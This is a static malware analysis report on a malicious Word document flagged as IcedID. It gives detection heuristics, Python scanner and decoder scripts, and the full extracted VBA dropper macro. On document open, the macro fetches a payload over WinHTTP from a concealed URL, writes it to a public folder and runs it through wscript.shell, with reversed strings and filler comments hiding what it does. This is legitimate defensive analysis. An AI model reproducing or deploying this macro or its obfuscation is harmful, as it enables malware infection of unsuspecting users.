Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e0ba68b40597e389…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 102.0 KB
Created: 2020-10-20 08:08:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-25
MD5: 38617ff33849f71b7bb7292da850dfbe
SHA-1: aa4dc12a4529e6fd3b06116dbafa39fafc9ca98a
SHA-256: e0ba68b40597e3891f009ae8fc3f10d17232c927a1ab740452c2cae7ac10c53e
Risk score: 290

Heuristics (7)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    eLjVO(icmaa + "." + "shell").exec (uESuS)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set xLkIg = VBA.CreateObject(zJGLt + "" + wBhYN)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The detail line naming the matched tokens did not survive in this rendering; in the extracted source, module YHHup contains both Sub AutoOpen() and the VBA.CreateObject(...) call, which is the pairing this rule describes.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 28 URLs below carry the same channel label, "In document text (OOXML body / shared strings)". Every one of them is an OOXML or Microsoft Office XML namespace URI (xmlns declarations in the document parts) that any Word-authored .docx contains; none is contacted at run time. The macro's actual download URL is absent from this list because it is stored reversed inside the first shape's AlternativeText and rebuilt at run time (see function DuIiL in the extracted source).
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
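The pairing rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as a small Python scanner so the "both tokens in the same stream" condition can be tested. This is an added example, not the analyzer's own code: the token lists are copied from the rule text, the stream names and contents are constructed stand-ins for the identifier strings recovered from compiled p-code, and the third stream mirrors two lines olevba extracted from module YHHup in this sample.

```python
import re

# Token classes exactly as enumerated by the OLE_VBA_PCODE_AUTOEXEC_EXEC rule text.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _present(tokens, text):
    """Tokens occurring in `text`. VBA identifiers are case-insensitive, so the
    match is too; it is a substring match, so "Shell" also hits "ShellExecute"
    and "wscript.shell", which is acceptable for a flag-only heuristic."""
    return [t for t in tokens if re.search(re.escape(t), text, re.IGNORECASE)]


def autoexec_exec_pair(stream_text):
    """Return (autoexec_tokens, exec_tokens) when BOTH classes occur in the same
    stream, otherwise None. Either class on its own never fires."""
    auto = _present(AUTOEXEC_TOKENS, stream_text)
    ex = _present(EXEC_TOKENS, stream_text)
    if auto and ex:
        return auto, ex
    return None


def scan_streams(streams):
    """Evaluate each stream independently; the pair is never assembled across
    streams. Returns {stream_name: (autoexec, exec)} for hits only."""
    hits = {}
    for name, text in streams.items():
        pair = autoexec_exec_pair(text)
        if pair:
            hits[name] = pair
    return hits


# Constructed sample streams (assumed stand-ins for recovered p-code strings).
SAMPLE_STREAMS = {
    # auto-exec only: a benign Document_Open handler, must not fire
    "VBA/ThisDocument": 'Sub Document_Open()\nMsgBox "welcome"\nEnd Sub',
    # exec token only, no entry point: must not fire
    "VBA/Module1": 'Set o = CreateObject("WScript.Shell")',
    # both in one stream, as in module YHHup of this sample: fires
    "VBA/YHHup": 'Sub AutoOpen()\n'
                 'Set xLkIg = VBA.CreateObject(zJGLt + "" + wBhYN)\n'
                 'End Sub',
}

if __name__ == "__main__":
    for name, (auto, ex) in scan_streams(SAMPLE_STREAMS).items():
        print(f"{name}: autoexec={auto} exec={ex}")
```

Because the rule keys on identifier strings rather than on source text, it survives VBA stomping: a document whose source module has been wiped still carries AutoOpen and CreateObject in the compiled stream, which is exactly the case the rule description calls "p-code-only".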

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 14953 bytes
SHA-256: 74ca2eed97d5f4890c39bcbf24fe7db77f9c13376e0e0b399356f3a4526a10fe
Preview script (first 1,000 lines of the extracted script; the decoded source is shorter than that, so what follows is the complete VBA, with the filler comment lines left in place as extracted)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YHHup"
Sub nJglC(xlueB, Optional ByVal veFbr As String = "c:\users\public\wHETA.txt", Optional ByVal wBhYN As String = "systemobject")
' Euphonious legible muck
' Plug contraceptive
' Byway multicolour unbidden cylindrically
' Laconically oversees unquenchable myopia deduction healths
' Technically encases urges hideously
' Hemisphere disingenuously presumptuously electrolytic teenyweeny bills
' Exuberant sipping
' Cubists seam
' Manias peremptory confusing reply
' Mangroves implode smelling nationality coincidentally explorable
' Illegitimate
' Preserver supernova
' Walked
' Swarm indigestion constraint
' Recondite brambles necromancers
' Irishmen regroup
' Privatisations
' Telephonist scalar
' Resides mistiness
' Picturing apartment molests
' Cushion centrally
' Glinting masterclass
' Limitless daunts
' Arriver names poodles retracted bate
' Divinity caking controllers nastiest belay
' Rollerskating disparate bucketing
' Derogate tacked classify larger
' Integrand bourbons airfield beetle
' Transitoriness
' Talon inferiority ingestion acyclic
' Costliest mutterers arrowing drafters mutual
' Artefactual proud deliberations rectilinear disallow
Set xLkIg = VBA.CreateObject(zJGLt + "" + wBhYN)
' Sprightlier lodgement guppy flatly strongholds
' Steaming demoralising unjustifiable harangued
' Syria deluxe upholsterers
' Cackle passwords raillery
' Unimaginable importation muddied deceptively
' Stolid biometric
Set mlTeb = xLkIg.CreateTextFile(veFbr)
' Creationism reconsulting carvings politeness
' Majolica grafted snapping ridiculously howlings altruist
' Wraith sinter
' Understudy illegality
' Sloped uselessly personality
' Repair despots
' Estuary refreshing reducer disconsolation
mlTeb.WriteLine xlueB
' Unpopularity bottled range
' Stipendiary
' Flexibilities dipsomaniacs exhilaration balmy substratum
' Purines gated grasshoppers interpellation
' Omens
' Applicator bowels macaque defamed
mlTeb.Close
' Containable classically mountings woodenness
' Ethnographic uninformatively
' Idiocy
' Raiding shown clammed
' Paltry partisans crusty
' Congratulatory tracker rectum ambles
' Attackers strives argon virginia puffballs
' Caterwauls feign
' Uncivil primarily
' Realism selfemployed fluency
' Retrievers durban chairs
' Cool bits shyest chessboard
' Trickled
' Flexion pedagogical ignition reggae puny demagnetisation
' Sacks tentative instabilities
' Segment mimicking stunted
' Grimmest airbus
' Moderating reproved delves
' Evacuated parleying mathematical pronunciations
' Bronchi blandly truces
' Soundcheck geniality breakfast beamy
' Unchanged appropriations waded misunderstanding revivalists
' Detach fissions remembers
' Attenuate humbler outer sienna
' Fringing dodecahedra teehee
' Beaked cloths
' Absolved automorphisms anorak therapeutically fumingly
' Gopher
' Spirits taints islanders journeyer postulate
' Carer desolated yellowed ditches joyous vigilante
' Vanish sheen imaged refunded
' Plateaus missionary dependencies
' Savoury observation
' Dangled interstices shortish
' Jambs brooch spillage hierarchies
' Stooges calves
' Misspend
' Pleats
' Negative prevaricated stall newsroom asteroid congestive
' Duvet chit velveteens fungous
End Sub
' Slamming employ decrements
' Melange regulator devising unarmed pluto
' Churchwarden vinyl deploring lampshades vindication lapland untyped
' Outpointing
' Reunions forbade
Sub AutoOpen()
' African freshly
' Explanatory nationality pleurisy
' Immoderately toggles adjournment level
' Swerves millionth
' Laboured maps strenuous pillow dejectedly
' Meteorologist elaboration compactions bader
' Biomedical insulate
' Sacking blockbusting personifies moonlighting rotatory bugger tremors glaciology
' Rom bracelets matriculating
' Virtually embarrasses hansard
' Tedious blackguard chrysanthemums buffet
' Vitals reintroducing impelled prosecutes
' Unzipping vastly purred
' Ministers equestrian
' Panthers
' Marsupial scrubbers recounted misdirect
' Inoperable transplant charmingly
' Theocracy fretwork
' Compete
' Guiders anaerobic races
' Barterer scolds copouts
' Paralytically reabsorption
' Dramatisations prolong
' Hinterland jar muff
' Inheritor prerogatives unexpurgated
' Slimness missal
' Marigold contraption evicted blacked
' Violinists plausible
' Dormouse unbeknown
Dim ZIOcb As New NAWgT
' Roughen faulty amalgamates cypher
' Equanimity militarily
' Comedies academically
' Chaperoned bookings decimalise livening infelicitously
' Deepfreezing
cApUh = ""
 
' Cartridges universes
' Symmetrical valets
' Washes titanically delved
' Maximises
' Caricatured comments codebreaker calculator censure
' Remanded distant jeered eve nudist
' Parades
' Condemnable mutes
' Ornamented apprehensive omelette
' Indexes goalkeeping
' Maddest quagga
' Prober vocalising exorcise toluene
' Swapper shrank synapses variant
' Frequent pronto backpacking cuffing enfranchising
xlueB = ZIOcb.DuIiL(SgtiJ)
' Texas contentious
' Valour
' Hamburgers thaws authoritatively irregularities
' Overproduction
' Apprehend expelling incommunicado
' Holdups repressing intricacy toucans wry
nJglC inJfa(xlueB)
' Subscriber eukaryotes helplines
' Upthrust obstructed pillared dampened baggages nave workpeople transmogrify
' Eukaryotes
' Obfuscate myopic sprinter hickory
' Arcane submerged hubris
' Serum holocaust aside purposive
' Doughs houseflies
' Dextral
' Gatecrashers milkmen glassful expresses
' Invariant wrasse
' Aquatics bodices
' Bulldozed alienates
XFSZq jPiYJ(0) + "vr32 c:\users\public\wHETA.txt", "wscript"
End Sub
Function jrHEz(sZefl, lvVvh)
' Cordite sheered
' Disaffiliate
' Marxists tendered convexity crossbred rubbery smoker
' Peacocks downsized
' Antipodes approvals serials thing
' Marshgas events
' Perturbing alt corners pupils
jrHEz = Split(sZefl, lvVvh)
End Function

Attribute VB_Name = "HKGlw"
' Energised bales satirised underfoot chrysanthemum intimidates
' Sheikh anaerobic madly falling
' Draughty embarrassingly righteous talkback heaven fundamentally robs looking
' Falsely reformation herbalists
' Afghan substances
Function inJfa(Vhdwh)
' Intersects psychosis gratings dismayed racism
' Constantly desperado
' Appraisingly
' Exercisable redefines
inJfa = StrConv(Vhdwh, vbUnicode)
' Portending stomping reconstitutes undefiled
' Gendered materialises
' Orienting
' Hearkened irradiation castor adamantly evilness
' Unlawfully eyelash allocates suggestions punier
End Function
' Cracked hygiene
' Unpromising chambered applauded vorticity stocked
' Scarecrows
' Translating disappointments prickly surfers icons
' Metaphysical reproducible ravish
' Sleights matters corroboration malaise
Function jSfja()
' Hypertonic klaxons nails cellar
' Romantics legatees morpheme stopover
' Speechifying rhododendrons swarthy money
' Erupts
' Seaward curry commented
' Penetratingly vaccinate lawlessness funerary perinatal
' Decentralisation divergence antidote spoonfuls
' Dissension slowish
' Destroys lashing
' Received wholesaling consternation
' Reflects inborn fouled overpriced devaluations
' Imparting invalided eosin haemoglobin
' Herein tridents
' Superabundant tempests accrual paragraph cartography
With ActiveDocument.shapes(1)
jSfja = .AlternativeText
End With
End Function
' Reimbursing nobleman
' Flouts
' Biplane
' Remedies
' Slows hares unsticking overdetermined
Function jPiYJ(yytCX)
' Rejuvenated invisibility jousting childbirth horseshoes
' Novelty exclaiming styx media detectable scuffles
' Lifespan boathouses westernmost spilt
' Authority amphitheatre
' Towel knew keels smelters gustiest repayments
' Unguided deliverers universals
' Resident constraining revival perceptual devotes darting
' Pickle goitre strops
' Footages reserve stultified hares reassured
' Analogical crumble criticism
' Landform incombustible cloudburst
' Easiness statehood jerking shackles
DGwoP = jrHEz(jSfja(), "~~~")
RwNYW = DGwoP(yytCX)
jPiYJ = RwNYW
End Function

Attribute VB_Name = "NAWgT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Dyrdm(pYesF)
' Peseta wretchedness slavery attitudinal
' Corral monophthongs ventriloquist usurious razing hearties
' Underwater
' Whereof crisis
' Skips dirtying agriculturalists illuminated
' Discourtesy powers
' Swindlers
' Tunisian wilted beaconed affiliating
' Middleweight displeasing inquisition
' Bonus underfunding allied
' Madras aerate
' Manic hibernation grasped glowingly
' Sharks digitisation pricked
' Intuitively socialite hippo slit reimburses
' Harpist
EdSBf = pYesF
QzNAy = Len(EdSBf)
For lqkis = 0 To QzNAy - 1
' Photolysis unyielding scrutinise unrolling
' Torchbearers decried sunspot indignant gratifications touchdown zenith
' Bipeds
' Evangelists borrowing
' Wadings kinship crones
' Garbled
' Batted beadings designating refreshingly masseurs
' Brusque raucously rotatable wholesaler
' Abuser
' Research earlobe poseidon patrilineal
' Religiously bail tackled
' Sachets thrice
' Implantation renovating lorry amity
' Quantifying retailers immemorial
' Denaturing exemptions silkier tempting
' Languish
' Unfailingly despots
' Change billiards candy remonstrated achieving dangle
IDHWO = IDHWO & Mid(EdSBf, (QzNAy - lqkis), 1)
Next lqkis
' Passionately hips unexcited aggressively unsharable deodorants
' Examined dips dried tubercular faculty buzzard
' Anvil newlywed nails lottery flapped morphologically
' Blossom squash
' Extremity
' Trusting
Dyrdm = IDHWO
End Function
' Tresses nuzzle
' Unaided shutdowns satin matriarchal
' Riposted typist glyphs remixed
' Bipedalism paleface knitter credibility defend
' Displacement confirmations
Function DuIiL(TnVvD)
' Boa ghastly
' Swearer encircle desegregation
' Picaresque promiscuity bluebell outrages
' Behemoth biographers confession glaciations
' Perineal subordinates captaining goldsmiths
Dim WCwYc As Object
' Ingot finely remonstrating concession
' Tussocks avail antiseptics
' Furriers
' Reviews peppercorn whispering neutrals broodiness
' Deniable broaches intently sorrowful
' Interpret clocking coronal knights tiring aggravations
' Viewing clinging nasalised unsuitably
' Patter thrombus louche utilitarians
' Poetically mending landslide
' Icepicks pottage spread enteritis
' Reiterates unworried ousts clumped drugged miniaturised
' Habitats payslips mindlessly unladylike
Set WCwYc = CreateObject(Dyrdm(TnVvD) + "." + Dyrdm(TnVvD) + "Request.5.1")
' Desiccation pawpaws inserting chimp napalm martens
' Dauber adulterous epileptics drink
' Booby freshened pentathlon teammate
' Flecks seronegative
' Weltering creator
' Speculator powers
' Housing rumple
' Magnetisation motherstobe
' Holler superstitiously ironmongery liaised sinusoidally
' Assimilate hearings from taproom negated assassin
' Chancing savoured divisions
' Westbound wetsuit linseed guillemots legwork
' Fatless crete vangogh collectively underloaded
' Disgraced
' Radiographers kinshasa
' Owing reviling
' Fearlessly impressiveness
' Frightened chanted
dGoeb = jPiYJ(1)
' Glasnost nogging
' Syrian
' Amendments
' Hey conger sued
' Controllers spiralling stentor chimed
' Adorn
WCwYc.Open "GET", Dyrdm(dGoeb), False
' Rehash butterfat ho curtained heartlands
' Refined separatists audience killer escorting
' Dismayed closable decorations
' Unfelt
' Furious bumpkins graffito flashier perspicacious unwise rejections
WCwYc.Send
' Parental glutton vied reclassify halfhour
' Blowfly cubist contraception incognito errs
' Rhapsodies confounds comradeship lagoon rampaging imbecile bouncing mouthtomouth
' Consultant abductor earned
' Heartbreaks insurances heroism
' Geishas singlemindedly
' Electrolysing swishy
' Chucking masks
DuIiL = WCwYc.responsebody
End Function

Attribute VB_Name = "iIzet"
Public Const SgtiJ As String = "ptthniw"
Public Const zJGLt As String = "scripting.file"
Function eLjVO(wGSgF)
Set eLjVO = CreateObject(wGSgF)
End Function
Sub XFSZq(uESuS, icmaa)
' Browbeaten stereos drubbed
' Importer pursed deluge evident showpieces dribbler
' Humming battered
' Propagate shoes
' Weighty exacerbation
' Pimple enjoyable storeroom
' Heuristically wright debauchery dimpled drafter irretrievably
' Trunk goaded reconciled
' Digester dissect cowgirl
' Antenatal purines
' Grovels uninjured grittier sandpipers dogmatically
' Unselfconscious misheard cozier
' Plural
' Tauter painkillers
' Yttrium
' Lords heckling
' Gently dimorphism
' Weakish seizures displeasure tubas
' Transitoriness
' Hyperventilation thrashing throroughly soaked binnacle ungracious
' Diluted compensate
' Disambiguation cobwebs
' Ambushed
eLjVO(icmaa + "." + "shell").exec (uESuS)
' Palatable eczema buyout agnostics
' Inexpressible grimy
' Dime largely schist
' Mongrels
' Muddy synthesised
' Raincoats coincidentally affected teapots
' Vagabonds tirades vogue financial
' Oversampled degaussed inalienable pontificated
' Uncovers unrecognised grumps particularism imperfections clumber
' Rabat
' Jacuzzi miserly
' Toughness intercessions solid
' Speedcop
' Orthodoxies monalisa supercritical overcook panorama dreamily
' Repulsive
' React honeyed resignation lawabiding both
' Epoch
' Chiropodist
' Indefeasible parchment lavender sages saddest
' Quakers catalysing
' Kinetics riddle ledgers tweets simplifies
' Interference floodlights
' Quince egoist trampled unsighted paella
' Despaired malts hunt ruefully
' Amuses firefighters outlets
' Flimsily legislatures placate
' Diffusers
' Springclean obstructions desert
' Shortbread bettering
' Paintbox mule clipping
' Wool
' Cardboard slicing estonia goggled triumphs
' Proficient transferable majorettes wafted preliminary
' Slumber ante
' Reinitialisation octagon cooperating strangler collaborating
' Mumbled wishfully incensed honeydew neutrals wallowing
' Disowning bulletins rancorous boisterously annals
' Exhibit luminary agitate
' Schedule stepwise
' Stalemated illusion reappraised gashing blacklists
' Headwaters effaced disparities divide
' Adapts
' Convulsive paternity
' Ibsen
' Fin modestly pony flocking hormonal
' Maladministration
' Moor ingots sternum recreations
' Fines patchy
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 52224 bytes
SHA-256: 8f22877f9bd2cd7dc5e8d639bbdecd2a470473ecb555150c4ae14b5fcaf38484
Detection: ClamAV Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely (analyzer verdict for this artifact; the decoded source above does rely on string reversal, run-time ProgID concatenation and filler comments, so read this field as the tool's heuristic on the binary project stream, not as a finding about the macro)
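Every sensitive string in the extracted source is built at run time: a reversed constant (SgtiJ), concatenated ProgID fragments (zJGLt + "systemobject", "wscript" + "." + "shell") and a "~~~"-separated string parked in the first shape's alternative text. The following Python replicates that construction statically, so the chain AutoOpen runs can be read without executing the macro. It is an added example, not part of the report or of the sample; function names mirror the VBA routines they replicate, and ALT_TEXT is a constructed stand-in (PREFIX and example.invalid are placeholders) because the real Shapes(1).AlternativeText is not present in this report.

```python
# Static reconstruction of the string building in the extracted macro.
# Constants are copied from module iIzet and the defaults of YHHup.nJglC.
SGTIJ = "ptthniw"                       # Public Const SgtiJ
ZJGLT = "scripting.file"                # Public Const zJGLt
DROP_PATH = r"c:\users\public\wHETA.txt"   # default veFbr in nJglC / literal in AutoOpen


def dyrdm(s: str) -> str:
    """Replicates NAWgT.Dyrdm: rebuilds the string back to front.
    The VBA loop reads Mid(s, n - i, 1) with 1-based indexing."""
    out = ""
    n = len(s)
    for i in range(n):
        out += s[n - 1 - i]
    return out


def jrhez(s: str, sep: str) -> list:
    """Replicates YHHup.jrHEz: Split(s, sep)."""
    return s.split(sep)


def jpiyj(alt_text: str, index: int) -> str:
    """Replicates HKGlw.jPiYJ: field `index` of the '~~~'-separated alt text."""
    return jrhez(alt_text, "~~~")[index]


def progids() -> dict:
    """The three COM ProgIDs the macro assembles at run time."""
    return {
        # NAWgT.DuIiL: CreateObject(Dyrdm(TnVvD) + "." + Dyrdm(TnVvD) + "Request.5.1")
        "download": dyrdm(SGTIJ) + "." + dyrdm(SGTIJ) + "Request.5.1",
        # YHHup.nJglC: VBA.CreateObject(zJGLt + "" + wBhYN), wBhYN defaults to "systemobject"
        "filesystem": ZJGLT + "" + "systemobject",
        # iIzet.XFSZq: eLjVO(icmaa + "." + "shell") with icmaa = "wscript"
        "launcher": "wscript" + "." + "shell",
    }


def execution_chain(alt_text: str) -> dict:
    """Resolves what AutoOpen does once the shape's alternative text is known."""
    ids = progids()
    url = dyrdm(jpiyj(alt_text, 1))                 # DuIiL: Open "GET", Dyrdm(jPiYJ(1)), False
    cmd = jpiyj(alt_text, 0) + "vr32 " + DROP_PATH  # AutoOpen: XFSZq jPiYJ(0) + "vr32 c:\...\wHETA.txt"
    return {
        "get": (ids["download"], "GET", url),       # response bytes -> inJfa (StrConv vbUnicode)
        "write": (ids["filesystem"], DROP_PATH),    # nJglC: CreateTextFile + WriteLine + Close
        "run": (ids["launcher"], cmd),              # XFSZq: .exec(cmd)
    }


# Constructed stand-in for ActiveDocument.Shapes(1).AlternativeText (assumption:
# the real value is not in the report). Field 0 is the unknown launcher prefix,
# field 1 is the download URL stored reversed, as DuIiL expects.
ALT_TEXT = "PREFIX~~~" + dyrdm("http://example.invalid/loader.bin")

if __name__ == "__main__":
    for step, detail in execution_chain(ALT_TEXT).items():
        print(step, detail)
```

What the resolved chain shows: DuIiL issues a synchronous GET through winhttp.winhttpRequest.5.1, inJfa widens the response bytes with StrConv(..., vbUnicode), nJglC writes that string to c:\users\public\wHETA.txt via scripting.filesystemobject (TextStream.WriteLine appends a line break, so the dropped file carries a trailing CRLF), and XFSZq runs "<prefix>vr32 c:\users\public\wHETA.txt" through wscript.shell. The launcher prefix and the URL are the two values not recoverable from the VBA alone; for a DrawingML shape they sit in the descr attribute of wp:docPr inside word/document.xml, and feeding that string to execution_chain completes the picture.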